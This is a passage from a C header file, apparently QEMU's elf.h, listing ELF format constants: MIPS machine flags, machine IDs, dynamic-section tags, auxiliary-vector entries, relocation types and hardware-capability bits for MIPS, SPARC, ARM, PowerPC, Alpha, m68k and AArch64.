#define EF_MIPS_MACH_3900 0x00810000 /* Toshiba R3900 */ #define EF_MIPS_MACH_4010 0x00820000 /* LSI R4010 */ #define EF_MIPS_MACH_4100 0x00830000 /* NEC VR4100 */ #define EF_MIPS_MACH_4650 0x00850000 /* MIPS R4650 */ #define EF_MIPS_MACH_4120 0x00870000 /* NEC VR4120 */ #define EF_MIPS_MACH_4111 0x00880000 /* NEC VR4111/VR4181 */ #define EF_MIPS_MACH_SB1 0x008a0000 /* Broadcom SB-1 */ #define EF_MIPS_MACH_OCTEON 0x008b0000 /* Cavium Networks Octeon */ #define EF_MIPS_MACH_XLR 0x008c0000 /* RMI Xlr */ #define EF_MIPS_MACH_OCTEON2 0x008d0000 /* Cavium Networks Octeon2 */ #define EF_MIPS_MACH_OCTEON3 0x008e0000 /* Cavium Networks Octeon3 */ #define EF_MIPS_MACH_5400 0x00910000 /* NEC VR5400 */ #define EF_MIPS_MACH_5900 0x00920000 /* Toshiba/Sony R5900 */ #define EF_MIPS_MACH_5500 0x00980000 /* NEC VR5500 */ #define EF_MIPS_MACH_9000 0x00990000 /* PMC-Sierra RM9000 */ #define EF_MIPS_MACH_LS2E 0x00a00000 /* ST Microelectronics Loongson 2E */ #define EF_MIPS_MACH_LS2F 0x00a10000 /* ST Microelectronics Loongson 2F */ #define EF_MIPS_MACH_LS3A 0x00a20000 /* ST Microelectronics Loongson 3A */ #define EF_MIPS_MACH 0x00ff0000 /* EF_MIPS_MACH_xxx selection mask */ #define MIPS_ABI_FP_UNKNOWN (-1) /* Unknown FP ABI (internal) */ #define MIPS_ABI_FP_ANY 0x0 /* FP ABI doesn't matter */ #define MIPS_ABI_FP_DOUBLE 0x1 /* -mdouble-float */ #define MIPS_ABI_FP_SINGLE 0x2 /* -msingle-float */ #define MIPS_ABI_FP_SOFT 0x3 /* -msoft-float */ #define MIPS_ABI_FP_OLD_64 0x4 /* -mips32r2 -mfp64 */ #define MIPS_ABI_FP_XX 0x5 /* -mfpxx */ #define MIPS_ABI_FP_64 0x6 /* -mips32r2 -mfp64 */ #define MIPS_ABI_FP_64A 0x7 /* -mips32r2 -mfp64 -mno-odd-spreg */ typedef struct mips_elf_abiflags_v0 { uint16_t version; /* Version of flags structure */ uint8_t isa_level; /* The level of the ISA: 1-5, 32, 64 */ uint8_t isa_rev; /* The revision of ISA: */ /* - 0 for MIPS V and below, */ /* - 1-n otherwise. */ uint8_t gpr_size; /* The size of general purpose registers */ uint8_t cpr1_size; /* The size of co-processor 1 registers */ uint8_t cpr2_size; /* The size of co-processor 2 registers */ uint8_t fp_abi; /* The floating-point ABI */ uint32_t isa_ext; /* Mask of processor-specific extensions */ uint32_t ases; /* Mask of ASEs used */ uint32_t flags1; /* Mask of general flags */ uint32_t flags2; } Mips_elf_abiflags_v0; /* These constants define the different elf file types */ #define ET_NONE 0 #define ET_REL 1 #define ET_EXEC 2 #define ET_DYN 3 #define ET_CORE 4 #define ET_LOPROC 0xff00 #define ET_HIPROC 0xffff /* These constants define the various ELF target machines */ #define EM_NONE 0 #define EM_M32 1 #define EM_SPARC 2 #define EM_386 3 #define EM_68K 4 #define EM_88K 5 #define EM_486 6 /* Perhaps disused */ #define EM_860 7 #define EM_MIPS 8 /* MIPS R3000 (officially, big-endian only) */ #define EM_MIPS_RS4_BE 10 /* MIPS R4000 big-endian */ #define EM_PARISC 15 /* HPPA */ #define EM_SPARC32PLUS 18 /* Sun's "v8plus" */ #define EM_PPC 20 /* PowerPC */ #define EM_PPC64 21 /* PowerPC64 */ #define EM_ARM 40 /* ARM */ #define EM_SH 42 /* SuperH */ #define EM_SPARCV9 43 /* SPARC v9 64-bit */ #define EM_TRICORE 44 /* Infineon TriCore */ #define EM_IA_64 50 /* HP/Intel IA-64 */ #define EM_X86_64 62 /* AMD x86-64 */ #define EM_S390 22 /* IBM S/390 */ #define EM_CRIS 76 /* Axis Communications 32-bit embedded processor */ #define EM_V850 87 /* NEC v850 */ #define EM_H8_300H 47 /* Hitachi H8/300H */ #define EM_H8S 48 /* Hitachi H8S */ #define EM_LATTICEMICO32 138 /* LatticeMico32 */ #define EM_OPENRISC 92 /* OpenCores OpenRISC */ #define EM_UNICORE32 110 /* UniCore32 */ #define EM_RISCV 243 /* RISC-V */ #define EM_NANOMIPS 249 /* Wave Computing nanoMIPS */ /* * This is an interim value that we will use until the committee comes * up with a final number. */ #define EM_ALPHA 0x9026 /* Bogus old v850 magic number, used by old tools. */ #define EM_CYGNUS_V850 0x9080 /* * This is the old interim value for S/390 architecture */ #define EM_S390_OLD 0xA390 #define EM_ALTERA_NIOS2 113 /* Altera Nios II soft-core processor */ #define EM_MICROBLAZE 189 #define EM_MICROBLAZE_OLD 0xBAAB #define EM_XTENSA 94 /* Tensilica Xtensa */ #define EM_AARCH64 183 #define EM_TILEGX 191 /* TILE-Gx */ #define EM_MOXIE 223 /* Moxie processor family */ #define EM_MOXIE_OLD 0xFEED /* This is the info that is needed to parse the dynamic section of the file */ #define DT_NULL 0 #define DT_NEEDED 1 #define DT_PLTRELSZ 2 #define DT_PLTGOT 3 #define DT_HASH 4 #define DT_STRTAB 5 #define DT_SYMTAB 6 #define DT_RELA 7 #define DT_RELASZ 8 #define DT_RELAENT 9 #define DT_STRSZ 10 #define DT_SYMENT 11 #define DT_INIT 12 #define DT_FINI 13 #define DT_SONAME 14 #define DT_RPATH 15 #define DT_SYMBOLIC 16 #define DT_REL 17 #define DT_RELSZ 18 #define DT_RELENT 19 #define DT_PLTREL 20 #define DT_DEBUG 21 #define DT_TEXTREL 22 #define DT_JMPREL 23 #define DT_BINDNOW 24 #define DT_INIT_ARRAY 25 #define DT_FINI_ARRAY 26 #define DT_INIT_ARRAYSZ 27 #define DT_FINI_ARRAYSZ 28 #define DT_RUNPATH 29 #define DT_FLAGS 30 #define DT_LOOS 0x6000000d #define DT_HIOS 0x6ffff000 #define DT_LOPROC 0x70000000 #define DT_HIPROC 0x7fffffff /* DT_ entries which fall between DT_VALRNGLO and DT_VALRNDHI use the d_val field of the Elf*_Dyn structure. I.e. they contain scalars. */ #define DT_VALRNGLO 0x6ffffd00 #define DT_VALRNGHI 0x6ffffdff /* DT_ entries which fall between DT_ADDRRNGLO and DT_ADDRRNGHI use the d_ptr field of the Elf*_Dyn structure. I.e. they contain pointers. */ #define DT_ADDRRNGLO 0x6ffffe00 #define DT_ADDRRNGHI 0x6ffffeff #define DT_VERSYM 0x6ffffff0 #define DT_RELACOUNT 0x6ffffff9 #define DT_RELCOUNT 0x6ffffffa #define DT_FLAGS_1 0x6ffffffb #define DT_VERDEF 0x6ffffffc #define DT_VERDEFNUM 0x6ffffffd #define DT_VERNEED 0x6ffffffe #define DT_VERNEEDNUM 0x6fffffff #define DT_MIPS_RLD_VERSION 0x70000001 #define DT_MIPS_TIME_STAMP 0x70000002 #define DT_MIPS_ICHECKSUM 0x70000003 #define DT_MIPS_IVERSION 0x70000004 #define DT_MIPS_FLAGS 0x70000005 #define RHF_NONE 0 #define RHF_HARDWAY 1 #define RHF_NOTPOT 2 #define DT_MIPS_BASE_ADDRESS 0x70000006 #define DT_MIPS_CONFLICT 0x70000008 #define DT_MIPS_LIBLIST 0x70000009 #define DT_MIPS_LOCAL_GOTNO 0x7000000a #define DT_MIPS_CONFLICTNO 0x7000000b #define DT_MIPS_LIBLISTNO 0x70000010 #define DT_MIPS_SYMTABNO 0x70000011 #define DT_MIPS_UNREFEXTNO 0x70000012 #define DT_MIPS_GOTSYM 0x70000013 #define DT_MIPS_HIPAGENO 0x70000014 #define DT_MIPS_RLD_MAP 0x70000016 /* This info is needed when parsing the symbol table */ #define STB_LOCAL 0 #define STB_GLOBAL 1 #define STB_WEAK 2 #define STT_NOTYPE 0 #define STT_OBJECT 1 #define STT_FUNC 2 #define STT_SECTION 3 #define STT_FILE 4 #define ELF_ST_BIND(x) ((x) >> 4) #define ELF_ST_TYPE(x) (((unsigned int) x) & 0xf) #define ELF_ST_INFO(bind, type) (((bind) << 4) | ((type) & 0xf)) #define ELF32_ST_BIND(x) ELF_ST_BIND(x) #define ELF32_ST_TYPE(x) ELF_ST_TYPE(x) #define ELF64_ST_BIND(x) ELF_ST_BIND(x) #define ELF64_ST_TYPE(x) ELF_ST_TYPE(x) /* Symbolic values for the entries in the auxiliary table put on the initial stack */ #define AT_NULL 0 /* end of vector */ #define AT_IGNORE 1 /* entry should be ignored */ #define AT_EXECFD 2 /* file descriptor of program */ #define AT_PHDR 3 /* program headers for program */ #define AT_PHENT 4 /* size of program header entry */ #define AT_PHNUM 5 /* number of program headers */ #define AT_PAGESZ 6 /* system page size */ #define AT_BASE 7 /* base address of interpreter */ #define AT_FLAGS 8 /* flags */ #define AT_ENTRY 9 /* entry point of program */ #define AT_NOTELF 10 /* program is not ELF */ #define AT_UID 11 /* real uid */ #define AT_EUID 12 /* effective uid */ #define AT_GID 13 /* real gid */ #define AT_EGID 14 /* effective gid */ #define AT_PLATFORM 15 /* string identifying CPU for optimizations */ #define AT_HWCAP 16 /* arch dependent hints at CPU capabilities */ #define AT_CLKTCK 17 /* frequency at which times() increments */ #define AT_FPUCW 18 /* info about fpu initialization by kernel */ #define AT_DCACHEBSIZE 19 /* data cache block size */ #define AT_ICACHEBSIZE 20 /* instruction cache block size */ #define AT_UCACHEBSIZE 21 /* unified cache block size */ #define AT_IGNOREPPC 22 /* ppc only; entry should be ignored */ #define AT_SECURE 23 /* boolean, was exec suid-like? */ #define AT_BASE_PLATFORM 24 /* string identifying real platforms */ #define AT_RANDOM 25 /* address of 16 random bytes */ #define AT_HWCAP2 26 /* extension of AT_HWCAP */ #define AT_EXECFN 31 /* filename of the executable */ #define AT_SYSINFO 32 /* address of kernel entry point */ #define AT_SYSINFO_EHDR 33 /* address of kernel vdso */ #define AT_L1I_CACHESHAPE 34 /* shapes of the caches: */ #define AT_L1D_CACHESHAPE 35 /* bits 0-3: cache associativity. */ #define AT_L2_CACHESHAPE 36 /* bits 4-7: log2 of line size. */ #define AT_L3_CACHESHAPE 37 /* val&~255: cache size. */ typedef struct dynamic{ Elf32_Sword d_tag; union{ Elf32_Sword d_val; Elf32_Addr d_ptr; } d_un; } Elf32_Dyn; typedef struct { Elf64_Sxword d_tag; /* entry tag value */ union { Elf64_Xword d_val; Elf64_Addr d_ptr; } d_un; } Elf64_Dyn; /* The following are used with relocations */ #define ELF32_R_SYM(x) ((x) >> 8) #define ELF32_R_TYPE(x) ((x) & 0xff) #define ELF64_R_SYM(i) ((i) >> 32) #define ELF64_R_TYPE(i) ((i) & 0xffffffff) #define ELF64_R_TYPE_DATA(i) (((ELF64_R_TYPE(i) >> 8) ^ 0x00800000) - 0x00800000) #define R_386_NONE 0 #define R_386_32 1 #define R_386_PC32 2 #define R_386_GOT32 3 #define R_386_PLT32 4 #define R_386_COPY 5 #define R_386_GLOB_DAT 6 #define R_386_JMP_SLOT 7 #define R_386_RELATIVE 8 #define R_386_GOTOFF 9 #define R_386_GOTPC 10 #define R_386_NUM 11 /* Not a dynamic reloc, so not included in R_386_NUM. Used in TCG. */ #define R_386_PC8 23 #define R_MIPS_NONE 0 #define R_MIPS_16 1 #define R_MIPS_32 2 #define R_MIPS_REL32 3 #define R_MIPS_26 4 #define R_MIPS_HI16 5 #define R_MIPS_LO16 6 #define R_MIPS_GPREL16 7 #define R_MIPS_LITERAL 8 #define R_MIPS_GOT16 9 #define R_MIPS_PC16 10 #define R_MIPS_CALL16 11 #define R_MIPS_GPREL32 12 /* The remaining relocs are defined on Irix, although they are not in the MIPS ELF ABI. */ #define R_MIPS_UNUSED1 13 #define R_MIPS_UNUSED2 14 #define R_MIPS_UNUSED3 15 #define R_MIPS_SHIFT5 16 #define R_MIPS_SHIFT6 17 #define R_MIPS_64 18 #define R_MIPS_GOT_DISP 19 #define R_MIPS_GOT_PAGE 20 #define R_MIPS_GOT_OFST 21 /* * The following two relocation types are specified in the MIPS ABI * conformance guide version 1.2 but not yet in the psABI. */ #define R_MIPS_GOTHI16 22 #define R_MIPS_GOTLO16 23 #define R_MIPS_SUB 24 #define R_MIPS_INSERT_A 25 #define R_MIPS_INSERT_B 26 #define R_MIPS_DELETE 27 #define R_MIPS_HIGHER 28 #define R_MIPS_HIGHEST 29 /* * The following two relocation types are specified in the MIPS ABI * conformance guide version 1.2 but not yet in the psABI. */ #define R_MIPS_CALLHI16 30 #define R_MIPS_CALLLO16 31 /* * This range is reserved for vendor specific relocations. */ #define R_MIPS_LOVENDOR 100 #define R_MIPS_HIVENDOR 127 /* SUN SPARC specific definitions. */ /* Values for Elf64_Ehdr.e_flags. */ #define EF_SPARCV9_MM 3 #define EF_SPARCV9_TSO 0 #define EF_SPARCV9_PSO 1 #define EF_SPARCV9_RMO 2 #define EF_SPARC_LEDATA 0x800000 /* little endian data */ #define EF_SPARC_EXT_MASK 0xFFFF00 #define EF_SPARC_32PLUS 0x000100 /* generic V8+ features */ #define EF_SPARC_SUN_US1 0x000200 /* Sun UltraSPARC1 extensions */ #define EF_SPARC_HAL_R1 0x000400 /* HAL R1 extensions */ #define EF_SPARC_SUN_US3 0x000800 /* Sun UltraSPARCIII extensions */ /* * Sparc ELF relocation types */ #define R_SPARC_NONE 0 #define R_SPARC_8 1 #define R_SPARC_16 2 #define R_SPARC_32 3 #define R_SPARC_DISP8 4 #define R_SPARC_DISP16 5 #define R_SPARC_DISP32 6 #define R_SPARC_WDISP30 7 #define R_SPARC_WDISP22 8 #define R_SPARC_HI22 9 #define R_SPARC_22 10 #define R_SPARC_13 11 #define R_SPARC_LO10 12 #define R_SPARC_GOT10 13 #define R_SPARC_GOT13 14 #define R_SPARC_GOT22 15 #define R_SPARC_PC10 16 #define R_SPARC_PC22 17 #define R_SPARC_WPLT30 18 #define R_SPARC_COPY 19 #define R_SPARC_GLOB_DAT 20 #define R_SPARC_JMP_SLOT 21 #define R_SPARC_RELATIVE 22 #define R_SPARC_UA32 23 #define R_SPARC_PLT32 24 #define R_SPARC_HIPLT22 25 #define R_SPARC_LOPLT10 26 #define R_SPARC_PCPLT32 27 #define R_SPARC_PCPLT22 28 #define R_SPARC_PCPLT10 29 #define R_SPARC_10 30 #define R_SPARC_11 31 #define R_SPARC_64 32 #define R_SPARC_OLO10 33 #define R_SPARC_HH22 34 #define R_SPARC_HM10 35 #define R_SPARC_LM22 36 #define R_SPARC_WDISP16 40 #define R_SPARC_WDISP19 41 #define R_SPARC_7 43 #define R_SPARC_5 44 #define R_SPARC_6 45 /* Bits present in AT_HWCAP for ARM. */ #define HWCAP_ARM_SWP (1 << 0) #define HWCAP_ARM_HALF (1 << 1) #define HWCAP_ARM_THUMB (1 << 2) #define HWCAP_ARM_26BIT (1 << 3) #define HWCAP_ARM_FAST_MULT (1 << 4) #define HWCAP_ARM_FPA (1 << 5) #define HWCAP_ARM_VFP (1 << 6) #define HWCAP_ARM_EDSP (1 << 7) #define HWCAP_ARM_JAVA (1 << 8) #define HWCAP_ARM_IWMMXT (1 << 9) #define HWCAP_ARM_CRUNCH (1 << 10) #define HWCAP_ARM_THUMBEE (1 << 11) #define HWCAP_ARM_NEON (1 << 12) #define HWCAP_ARM_VFPv3 (1 << 13) #define HWCAP_ARM_VFPv3D16 (1 << 14) /* also set for VFPv4-D16 */ #define HWCAP_ARM_TLS (1 << 15) #define HWCAP_ARM_VFPv4 (1 << 16) #define HWCAP_ARM_IDIVA (1 << 17) #define HWCAP_ARM_IDIVT (1 << 18) #define HWCAP_IDIV (HWCAP_IDIVA | HWCAP_IDIVT) #define HWCAP_VFPD32 (1 << 19) /* set if VFP has 32 regs */ #define HWCAP_LPAE (1 << 20) /* Bits present in AT_HWCAP for PowerPC. */ #define PPC_FEATURE_32 0x80000000 #define PPC_FEATURE_64 0x40000000 #define PPC_FEATURE_601_INSTR 0x20000000 #define PPC_FEATURE_HAS_ALTIVEC 0x10000000 #define PPC_FEATURE_HAS_FPU 0x08000000 #define PPC_FEATURE_HAS_MMU 0x04000000 #define PPC_FEATURE_HAS_4xxMAC 0x02000000 #define PPC_FEATURE_UNIFIED_CACHE 0x01000000 #define PPC_FEATURE_HAS_SPE 0x00800000 #define PPC_FEATURE_HAS_EFP_SINGLE 0x00400000 #define PPC_FEATURE_HAS_EFP_DOUBLE 0x00200000 #define PPC_FEATURE_NO_TB 0x00100000 #define PPC_FEATURE_POWER4 0x00080000 #define PPC_FEATURE_POWER5 0x00040000 #define PPC_FEATURE_POWER5_PLUS 0x00020000 #define PPC_FEATURE_CELL 0x00010000 #define PPC_FEATURE_BOOKE 0x00008000 #define PPC_FEATURE_SMT 0x00004000 #define PPC_FEATURE_ICACHE_SNOOP 0x00002000 #define PPC_FEATURE_ARCH_2_05 0x00001000 #define PPC_FEATURE_PA6T 0x00000800 #define PPC_FEATURE_HAS_DFP 0x00000400 #define PPC_FEATURE_POWER6_EXT 0x00000200 #define PPC_FEATURE_ARCH_2_06 0x00000100 #define PPC_FEATURE_HAS_VSX 0x00000080 #define PPC_FEATURE_PSERIES_PERFMON_COMPAT \ 0x00000040 #define PPC_FEATURE_TRUE_LE 0x00000002 #define PPC_FEATURE_PPC_LE 0x00000001 /* Bits present in AT_HWCAP2 for PowerPC. */ #define PPC_FEATURE2_ARCH_2_07 0x80000000 #define PPC_FEATURE2_HAS_HTM 0x40000000 #define PPC_FEATURE2_HAS_DSCR 0x20000000 #define PPC_FEATURE2_HAS_EBB 0x10000000 #define PPC_FEATURE2_HAS_ISEL 0x08000000 #define PPC_FEATURE2_HAS_TAR 0x04000000 #define PPC_FEATURE2_HAS_VEC_CRYPTO 0x02000000 #define PPC_FEATURE2_HTM_NOSC 0x01000000 #define PPC_FEATURE2_ARCH_3_00 0x00800000 #define PPC_FEATURE2_HAS_IEEE128 0x00400000 /* Bits present in AT_HWCAP for Sparc. */ #define HWCAP_SPARC_FLUSH 0x00000001 #define HWCAP_SPARC_STBAR 0x00000002 #define HWCAP_SPARC_SWAP 0x00000004 #define HWCAP_SPARC_MULDIV 0x00000008 #define HWCAP_SPARC_V9 0x00000010 #define HWCAP_SPARC_ULTRA3 0x00000020 #define HWCAP_SPARC_BLKINIT 0x00000040 #define HWCAP_SPARC_N2 0x00000080 #define HWCAP_SPARC_MUL32 0x00000100 #define HWCAP_SPARC_DIV32 0x00000200 #define HWCAP_SPARC_FSMULD 0x00000400 #define HWCAP_SPARC_V8PLUS 0x00000800 #define HWCAP_SPARC_POPC 0x00001000 #define HWCAP_SPARC_VIS 0x00002000 #define HWCAP_SPARC_VIS2 0x00004000 #define HWCAP_SPARC_ASI_BLK_INIT 0x00008000 #define HWCAP_SPARC_FMAF 0x00010000 #define HWCAP_SPARC_VIS3 0x00020000 #define HWCAP_SPARC_HPC 0x00040000 #define HWCAP_SPARC_RANDOM 0x00080000 #define HWCAP_SPARC_TRANS 0x00100000 #define HWCAP_SPARC_FJFMAU 0x00200000 #define HWCAP_SPARC_IMA 0x00400000 #define HWCAP_SPARC_ASI_CACHE_SPARING 0x00800000 #define HWCAP_SPARC_PAUSE 0x01000000 #define HWCAP_SPARC_CBCOND 0x02000000 #define HWCAP_SPARC_CRYPTO 0x04000000 /* Bits present in AT_HWCAP for s390. */ #define HWCAP_S390_ESAN3 1 #define HWCAP_S390_ZARCH 2 #define HWCAP_S390_STFLE 4 #define HWCAP_S390_MSA 8 #define HWCAP_S390_LDISP 16 #define HWCAP_S390_EIMM 32 #define HWCAP_S390_DFP 64 #define HWCAP_S390_HPAGE 128 #define HWCAP_S390_ETF3EH 256 #define HWCAP_S390_HIGH_GPRS 512 #define HWCAP_S390_TE 1024 #define HWCAP_S390_VXRS 2048 /* M68K specific definitions. */ /* We use the top 24 bits to encode information about the architecture variant. */ #define EF_M68K_CPU32 0x00810000 #define EF_M68K_M68000 0x01000000 #define EF_M68K_CFV4E 0x00008000 #define EF_M68K_FIDO 0x02000000 #define EF_M68K_ARCH_MASK \ (EF_M68K_M68000 | EF_M68K_CPU32 | EF_M68K_CFV4E | EF_M68K_FIDO) /* We use the bottom 8 bits to encode information about the coldfire variant. If we use any of these bits, the top 24 bits are either 0 or EF_M68K_CFV4E. */ #define EF_M68K_CF_ISA_MASK 0x0F /* Which ISA */ #define EF_M68K_CF_ISA_A_NODIV 0x01 /* ISA A except for div */ #define EF_M68K_CF_ISA_A 0x02 #define EF_M68K_CF_ISA_A_PLUS 0x03 #define EF_M68K_CF_ISA_B_NOUSP 0x04 /* ISA_B except for USP */ #define EF_M68K_CF_ISA_B 0x05 #define EF_M68K_CF_ISA_C 0x06 #define EF_M68K_CF_ISA_C_NODIV 0x07 /* ISA C except for div */ #define EF_M68K_CF_MAC_MASK 0x30 #define EF_M68K_CF_MAC 0x10 /* MAC */ #define EF_M68K_CF_EMAC 0x20 /* EMAC */ #define EF_M68K_CF_EMAC_B 0x30 /* EMAC_B */ #define EF_M68K_CF_FLOAT 0x40 /* Has float insns */ #define EF_M68K_CF_MASK 0xFF /* * 68k ELF relocation types */ #define R_68K_NONE 0 #define R_68K_32 1 #define R_68K_16 2 #define R_68K_8 3 #define R_68K_PC32 4 #define R_68K_PC16 5 #define R_68K_PC8 6 #define R_68K_GOT32 7 #define R_68K_GOT16 8 #define R_68K_GOT8 9 #define R_68K_GOT32O 10 #define R_68K_GOT16O 11 #define R_68K_GOT8O 12 #define R_68K_PLT32 13 #define R_68K_PLT16 14 #define R_68K_PLT8 15 #define R_68K_PLT32O 16 #define R_68K_PLT16O 17 #define R_68K_PLT8O 18 #define R_68K_COPY 19 #define R_68K_GLOB_DAT 20 #define R_68K_JMP_SLOT 21 #define R_68K_RELATIVE 22 /* * Alpha ELF relocation types */ #define R_ALPHA_NONE 0 /* No reloc */ #define R_ALPHA_REFLONG 1 /* Direct 32 bit */ #define R_ALPHA_REFQUAD 2 /* Direct 64 bit */ #define R_ALPHA_GPREL32 3 /* GP relative 32 bit */ #define R_ALPHA_LITERAL 4 /* GP relative 16 bit w/optimization */ #define R_ALPHA_LITUSE 5 /* Optimization hint for LITERAL */ #define R_ALPHA_GPDISP 6 /* Add displacement to GP */ #define R_ALPHA_BRADDR 7 /* PC+4 relative 23 bit shifted */ #define R_ALPHA_HINT 8 /* PC+4 relative 16 bit shifted */ #define R_ALPHA_SREL16 9 /* PC relative 16 bit */ #define R_ALPHA_SREL32 10 /* PC relative 32 bit */ #define R_ALPHA_SREL64 11 /* PC relative 64 bit */ #define R_ALPHA_GPRELHIGH 17 /* GP relative 32 bit, high 16 bits */ #define R_ALPHA_GPRELLOW 18 /* GP relative 32 bit, low 16 bits */ #define R_ALPHA_GPREL16 19 /* GP relative 16 bit */ #define R_ALPHA_COPY 24 /* Copy symbol at runtime */ #define R_ALPHA_GLOB_DAT 25 /* Create GOT entry */ #define R_ALPHA_JMP_SLOT 26 /* Create PLT entry */ #define R_ALPHA_RELATIVE 27 /* Adjust by program base */ #define R_ALPHA_BRSGP 28 #define R_ALPHA_TLSGD 29 #define R_ALPHA_TLS_LDM 30 #define R_ALPHA_DTPMOD64 31 #define R_ALPHA_GOTDTPREL 32 #define R_ALPHA_DTPREL64 33 #define R_ALPHA_DTPRELHI 34 #define R_ALPHA_DTPRELLO 35 #define R_ALPHA_DTPREL16 36 #define R_ALPHA_GOTTPREL 37 #define R_ALPHA_TPREL64 38 #define R_ALPHA_TPRELHI 39 #define R_ALPHA_TPRELLO 40 #define R_ALPHA_TPREL16 41 #define SHF_ALPHA_GPREL 0x10000000 /* PowerPC specific definitions. */ /* Processor specific flags for the ELF header e_flags field. */ #define EF_PPC64_ABI 0x3 /* PowerPC relocations defined by the ABIs */ #define R_PPC_NONE 0 #define R_PPC_ADDR32 1 /* 32bit absolute address */ #define R_PPC_ADDR24 2 /* 26bit address, 2 bits ignored. */ #define R_PPC_ADDR16 3 /* 16bit absolute address */ #define R_PPC_ADDR16_LO 4 /* lower 16bit of absolute address */ #define R_PPC_ADDR16_HI 5 /* high 16bit of absolute address */ #define R_PPC_ADDR16_HA 6 /* adjusted high 16bit */ #define R_PPC_ADDR14 7 /* 16bit address, 2 bits ignored */ #define R_PPC_ADDR14_BRTAKEN 8 #define R_PPC_ADDR14_BRNTAKEN 9 #define R_PPC_REL24 10 /* PC relative 26 bit */ #define R_PPC_REL14 11 /* PC relative 16 bit */ #define R_PPC_REL14_BRTAKEN 12 #define R_PPC_REL14_BRNTAKEN 13 #define R_PPC_GOT16 14 #define R_PPC_GOT16_LO 15 #define R_PPC_GOT16_HI 16 #define R_PPC_GOT16_HA 17 #define R_PPC_PLTREL24 18 #define R_PPC_COPY 19 #define R_PPC_GLOB_DAT 20 #define R_PPC_JMP_SLOT 21 #define R_PPC_RELATIVE 22 #define R_PPC_LOCAL24PC 23 #define R_PPC_UADDR32 24 #define R_PPC_UADDR16 25 #define R_PPC_REL32 26 #define R_PPC_PLT32 27 #define R_PPC_PLTREL32 28 #define R_PPC_PLT16_LO 29 #define R_PPC_PLT16_HI 30 #define R_PPC_PLT16_HA 31 #define R_PPC_SDAREL16 32 #define R_PPC_SECTOFF 33 #define R_PPC_SECTOFF_LO 34 #define R_PPC_SECTOFF_HI 35 #define R_PPC_SECTOFF_HA 36 /* Keep this the last entry. */ #ifndef R_PPC_NUM #define R_PPC_NUM 37 #endif /* ARM specific declarations */ /* Processor specific flags for the ELF header e_flags field. */ #define EF_ARM_RELEXEC 0x01 #define EF_ARM_HASENTRY 0x02 #define EF_ARM_INTERWORK 0x04 #define EF_ARM_APCS_26 0x08 #define EF_ARM_APCS_FLOAT 0x10 #define EF_ARM_PIC 0x20 #define EF_ALIGN8 0x40 /* 8-bit structure alignment is in use */ #define EF_NEW_ABI 0x80 #define EF_OLD_ABI 0x100 #define EF_ARM_SOFT_FLOAT 0x200 #define EF_ARM_VFP_FLOAT 0x400 #define EF_ARM_MAVERICK_FLOAT 0x800 /* Other constants defined in the ARM ELF spec. version B-01. */ #define EF_ARM_SYMSARESORTED 0x04 /* NB conflicts with EF_INTERWORK */ #define EF_ARM_DYNSYMSUSESEGIDX 0x08 /* NB conflicts with EF_APCS26 */ #define EF_ARM_MAPSYMSFIRST 0x10 /* NB conflicts with EF_APCS_FLOAT */ #define EF_ARM_EABIMASK 0xFF000000 /* Constants defined in AAELF. */ #define EF_ARM_BE8 0x00800000 #define EF_ARM_LE8 0x00400000 #define EF_ARM_EABI_VERSION(flags) ((flags) & EF_ARM_EABIMASK) #define EF_ARM_EABI_UNKNOWN 0x00000000 #define EF_ARM_EABI_VER1 0x01000000 #define EF_ARM_EABI_VER2 0x02000000 #define EF_ARM_EABI_VER3 0x03000000 #define EF_ARM_EABI_VER4 0x04000000 #define EF_ARM_EABI_VER5 0x05000000 /* Additional symbol types for Thumb */ #define STT_ARM_TFUNC 0xd /* ARM-specific values for sh_flags */ #define SHF_ARM_ENTRYSECT 0x10000000 /* Section contains an entry point */ #define SHF_ARM_COMDEF 0x80000000 /* Section may be multiply defined in the input to a link step */ /* ARM-specific program header flags */ #define PF_ARM_SB 0x10000000 /* Segment contains the location addressed by the static base */ /* ARM relocs. */ #define R_ARM_NONE 0 /* No reloc */ #define R_ARM_PC24 1 /* PC relative 26 bit branch */ #define R_ARM_ABS32 2 /* Direct 32 bit */ #define R_ARM_REL32 3 /* PC relative 32 bit */ #define R_ARM_PC13 4 #define R_ARM_ABS16 5 /* Direct 16 bit */ #define R_ARM_ABS12 6 /* Direct 12 bit */ #define R_ARM_THM_ABS5 7 #define R_ARM_ABS8 8 /* Direct 8 bit */ #define R_ARM_SBREL32 9 #define R_ARM_THM_PC22 10 #define R_ARM_THM_PC8 11 #define R_ARM_AMP_VCALL9 12 #define R_ARM_SWI24 13 #define R_ARM_THM_SWI8 14 #define R_ARM_XPC25 15 #define R_ARM_THM_XPC22 16 #define R_ARM_COPY 20 /* Copy symbol at runtime */ #define R_ARM_GLOB_DAT 21 /* Create GOT entry */ #define R_ARM_JUMP_SLOT 22 /* Create PLT entry */ #define R_ARM_RELATIVE 23 /* Adjust by program base */ #define R_ARM_GOTOFF 24 /* 32 bit offset to GOT */ #define R_ARM_GOTPC 25 /* 32 bit PC relative offset to GOT */ #define R_ARM_GOT32 26 /* 32 bit GOT entry */ #define R_ARM_PLT32 27 /* 32 bit PLT address */ #define R_ARM_CALL 28 #define R_ARM_JUMP24 29 #define R_ARM_GNU_VTENTRY 100 #define R_ARM_GNU_VTINHERIT 101 #define R_ARM_THM_PC11 102 /* thumb unconditional branch */ #define R_ARM_THM_PC9 103 /* thumb conditional branch */ #define R_ARM_RXPC25 249 #define R_ARM_RSBREL32 250 #define R_ARM_THM_RPC22 251 #define R_ARM_RREL32 252 #define R_ARM_RABS22 253 #define R_ARM_RPC24 254 #define R_ARM_RBASE 255 /* Keep this the last entry. */ #define R_ARM_NUM 256 /* ARM Aarch64 relocation types */ #define R_AARCH64_NONE 256 /* also accepts R_ARM_NONE (0) */ /* static data relocations */ #define R_AARCH64_ABS64 257 #define R_AARCH64_ABS32 258 #define R_AARCH64_ABS16 259 #define R_AARCH64_PREL64 260 #define R_AARCH64_PREL32 261 #define R_AARCH64_PREL16 262 /* static aarch64 group relocations */ /* group relocs to create unsigned data value or address inline */ #define R_AARCH64_MOVW_UABS_G0 263 #define R_AARCH64_MOVW_UABS_G0_NC 264 #define R_AARCH64_MOVW_UABS_G1 265 #define R_AARCH64_MOVW_UABS_G1_NC 266 #define R_AARCH64_MOVW_UABS_G2 267 #define R_AARCH64_MOVW_UABS_G2_NC 268 #define R_AARCH64_MOVW_UABS_G3 269 /* group relocs to create signed data or offset value inline */ #define R_AARCH64_MOVW_SABS_G0 270 #define R_AARCH64_MOVW_SABS_G1 271 #define R_AARCH64_MOVW_SABS_G2 272 /* relocs to generate 19, 21, and 33 bit PC-relative addresses */ #define 